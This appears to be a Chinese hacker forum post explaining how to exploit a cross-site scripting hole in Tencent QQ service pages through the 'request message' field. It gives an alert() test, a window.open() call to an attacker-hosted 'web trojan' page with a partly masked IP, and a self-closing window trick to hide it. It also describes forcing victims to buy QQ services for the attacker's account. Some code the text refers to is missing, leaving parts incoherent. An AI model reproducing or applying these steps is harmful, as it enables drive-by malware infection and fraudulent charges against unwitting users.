摘要:
这阶段跨站闹的很凶..QQ也接连出了几个跨站漏洞..这不.QQ业务也出了跨站漏洞..经过测试,不论是QQ会员,黄钻贵族,QQ炫铃.等..都可以跨站.. 关键字:
QQ业务 跨站漏洞 正文:
这阶段跨站闹的很凶..QQ也接连出了几个跨站漏洞..这不.QQ业务也出了跨站漏洞..经过测试,不论是QQ会员,黄钻贵族,QQ炫铃.等..都可以跨站..
这个漏洞也不是我发现的..是我的好友netshow告诉我的..听他说也是经过玄猫指点..所以在这里也要感谢玄猫 ..又为我们带来了一经典之作..
具体危害和玄猫写过的一篇"QQ跨站漏洞巧利用强迫他人为你购买QQ秀"差不多..只是这个是用来购买腾讯服务的...这个危害比那个还要大...如果你的QQ币足够支付的话.
首先我们来看一下这个漏洞.
首先进入
http://my.qq.com/
打开业务列表..随便点个业务把..在"索要留言"里写代码:alert(fhod);
这时候对方QQ会出现系统提示..
这里我们的留言很明显就被对方看到了..所以我们在留言的时候最好在前
面写一段话....然后后面在写alert(fhod);
然后对方查看的时候就会在浏览器上弹出一个内容为"fhod"的对话框. 那我们能不能利用它来做些什么呢?其实这个漏洞是完全可以让对方给你购买服务的..前提是只要对方查看了..
不过我对脚本不是很懂,.所以没做深入研究..我想只要把玄猫的那个看懂了..就可以举一反三..彻底的利用这
个漏洞..
我简单说下我怎么做的把
测试的时候在留言处写进行挂马是行不通的..我写了 然后查看接受的代码就成了
QQ炫铃服务费用:预支付个月,总金额为: Q币
您可以修改预支付的月数。
他的留言:试下这个
很显然..腾讯给过滤了...而用window.open("http://218.xx.xx.2xx/kz1.htm");
就完全可以执行成功....然后我们可以在kz1.htm里写这么一段代码 window.opener=top; window.close();
上面那个http://218.xx.xx.xxx/kz.htm 是我们的网页木马地址/..具体什么马视个人需要而定window.opener=top; window.close();
打开此页面就即刻关闭窗口..起隐蔽的作用或者在一个HTM页面写如以下代码 上面代码意思是给1988415这个号购买一个月的服务..留言是123
在网上看到的以前老方法..自己试了下出现登陆的页面...可能腾讯已经修改了这个漏洞把..有兴趣可以试下.
我暂时就研究这么多.这几天累死了....抽空继续研究下..先发出来..大家有兴趣的欢迎继续研究..有了成果记的与我分享!!
